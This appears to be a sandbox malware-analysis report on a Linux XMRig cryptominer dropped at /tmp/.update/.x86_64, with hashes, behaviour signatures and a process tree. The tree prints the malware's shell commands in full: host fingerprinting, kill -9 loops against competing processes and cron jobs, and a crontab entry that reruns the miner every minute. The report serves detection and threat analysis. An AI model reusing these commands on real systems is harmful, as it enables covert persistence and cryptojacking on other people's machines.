Analysis
-
max time kernel
149s -
max time network
143s -
platform
ubuntu-22.04_amd64 -
resource
ubuntu2204-amd64-20240611-en -
resource tags
-
submitted
08-11-2024 11:36
General
-
Target
.update/.x86_64
-
Size
2.3MB
-
MD5
fb95fc8c3ed253dec1b08722f1bbf18e
-
SHA1
d48d6dc76323efa8c0ae799d245a650b9d914c09
-
SHA256
215293b8bdd0a57497d5cc62421e64bb29334e088578679cbf509d66c7b7dc7e
-
SHA512
498f68c04f66a4cbcfed7e38f779183b2a7766948def1d159158c2799893ddcfb9a7dc2762c8958d6ae479a62f71edee460ac31a5939aa3c149efe59a987834e
-
SSDEEP
49152:QM4HMaoo1fdQLCS1ytoWW7b/7GN2PM6jm:94Hp11aChtoB7b/7GYEZ
Score
10/10
Malware Config
Signatures
-
Xmrig family
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
XMRig Miner payload 1 IoCs
-
Checks hardware identifiers (DMI) 1 TTPs 4 IoCs
Checks DMI information which indicate if the system is a virtual machine.
-
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Reads hardware information 1 TTPs 14 IoCs
Accesses system info like serial numbers, manufacturer names etc.
-
Security Software Discovery 1 TTPs 2 IoCs
Adversaries may attempt to discover installed security software and its configurations.
-
Checks CPU configuration 1 TTPs 3 IoCs
Checks CPU information which indicate if the system is a virtual machine.
-
Reads CPU attributes 1 TTPs 7 IoCs
-
Enumerates kernel/hardware configuration 1 TTPs 62 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
-
Process Discovery 1 TTPs 2 IoCs
Adversaries may try to discover information about running processes.
-
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
-
Writes file to tmp directory 2 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/.update/.x86_64/tmp/.update/.x86_641⤵
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
- Writes file to tmp directory
-
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""2⤵
-
/usr/bin/hostnamehostname -I3⤵
-
-
/usr/bin/awkawk "{print \$1}"3⤵
-
-
/usr/bin/awkawk "{print \"-\"\$2}"3⤵
-
-
/usr/bin/headhead -n 13⤵
-
-
/usr/bin/grepgrep "Port "3⤵
-
-
/usr/bin/catcat /etc/ssh/sshd_config3⤵
-
-
/usr/bin/whoamiwhoami3⤵
-
-
/usr/bin/hostnamehostname3⤵
-
-
/usr/bin/grepgrep -c "^processor" /proc/cpuinfo3⤵
- Checks CPU configuration
-
-
/usr/bin/sedsed -e "s/\$//"3⤵
-
-
/usr/bin/sedsed -e "s/^ *//"3⤵
-
-
/usr/bin/cutcut -d: -f23⤵
-
-
/usr/bin/grepgrep -m 1 "model name" /proc/cpuinfo3⤵
- Checks CPU configuration
-
-
/usr/bin/awkawk "{print \$1}"3⤵
-
-
/usr/bin/awkawk "{print \$4}"3⤵
-
-
/usr/bin/awkawk "{print \$4}"3⤵
- Reads runtime system information
-
-
/usr/bin/awkawk "{print \$3}"3⤵
-
-
/usr/bin/awkawk "{print \$4}"3⤵
-
-
/usr/bin/awkawk "{print \$1}"3⤵
-
-
/usr/bin/awkawk "{print \$2\" \"\$3\" \"\$4}"3⤵
- Reads runtime system information
-
-
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"2⤵
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"3⤵
-
-
/usr/bin/psps -A "-ostat,ppid"3⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/idid -u3⤵
-
-
/usr/bin/grepgrep -v grep3⤵
-
-
/usr/bin/grepgrep /etc/cron3⤵
-
-
/usr/bin/psps x3⤵
- Reads CPU attributes
- Reads runtime system information
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"2⤵
- Security Software Discovery
-
/usr/bin/idid -u3⤵
-
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"3⤵
-
-
/usr/bin/grepgrep -v /usr/sbin/httpd3⤵
-
-
/usr/bin/grepgrep -v -- "-bash[[:space:]]*\$"3⤵
-
-
/usr/bin/grepgrep -v grep3⤵
-
-
/usr/bin/psps aux3⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
-
-
-
/bin/shsh -c "dir=`pwd 2>/dev/null`;rm -rf \$dir/.cron 2>/dev/null;crontab -l 2>/dev/null | grep -v grep 2>/dev/null | grep -v '/tmp/.update/.x86_64' 2>/dev/null > .cron 2>/dev/null;echo '* * * * * '\$dir/'/tmp/.update/.x86_64' >> .cron 2>/dev/null; if [ \$(crontab -l 2>/dev/null | grep -v grep 2>/dev/null | grep '/tmp/.update/.x86_64\$' 2>/dev/null | sort 2>/dev/null | uniq 2>/dev/null | wc -l 2>/dev/null) -eq '0' ]; then crontab \$dir/.cron 2>/dev/null; fi;rm -rf \$dir/.cron 2>/dev/null"2⤵
- Writes file to tmp directory
-
/usr/bin/rmrm -rf /tmp/.update/.cron3⤵
-
-
/usr/bin/grepgrep -v /tmp/.update/.x86_643⤵
-
-
/usr/bin/grepgrep -v grep3⤵
-
-
/usr/bin/crontabcrontab -l3⤵
-
-
/usr/bin/wcwc -l3⤵
-
-
/usr/bin/uniquniq3⤵
-
-
/usr/bin/sortsort3⤵
-
-
/usr/bin/grepgrep "/tmp/.update/.x86_64\$"3⤵
-
-
/usr/bin/grepgrep -v grep3⤵
-
-
/usr/bin/crontabcrontab -l3⤵
-
-
/usr/bin/crontabcrontab /tmp/.update/.cron3⤵
- Creates/modifies Cron job
-
-
/usr/bin/rmrm -rf /tmp/.update/.cron3⤵
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"2⤵
- Security Software Discovery
-
/usr/bin/idid -u3⤵
-
-
/usr/bin/wcwc -l3⤵
-
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"3⤵
-
-
/usr/bin/grepgrep -- "-bash[[:space:]]*\$"3⤵
-
-
/usr/bin/grepgrep -v grep3⤵
-
-
/usr/bin/psps aux3⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
44B
MD5d9da11a4b232a0003f710416ca81b6dd
SHA10ef01cf8be696a94f0c20223dc85f68cbc9038c1
SHA2561842334260d8c3c1b5278c7ffcb6e8bae750cafcdfe41d7c40e5faa9d26e72ee
SHA512b7f72c07c53aac4cea28e15d678ce70de3cea04928afa7b6f2e835fefaf40462879cfa7c941f0d0f47ac1b6ff50a6e54072d3f980f93279f0f86118ac98f4e32
-
Filesize
236B
MD5dbbe047a01305ffcd7927d8a56c55eb1
SHA11c7db54bf5706ef8df444e4d7535b6f32dd5f96d
SHA25663d9f82a6a2fe9b6e17112df9bccf53a931add1ec27f01a47e7af9024dafe670
SHA5128e5263187070b7236bcbda6b18c9b2f2546b37135e019cd2011028d7d36cccf76d402cde20f9ff7510ffff20b7568d7899cdc9a375f348b3ebb9cc584c9ed1a0
-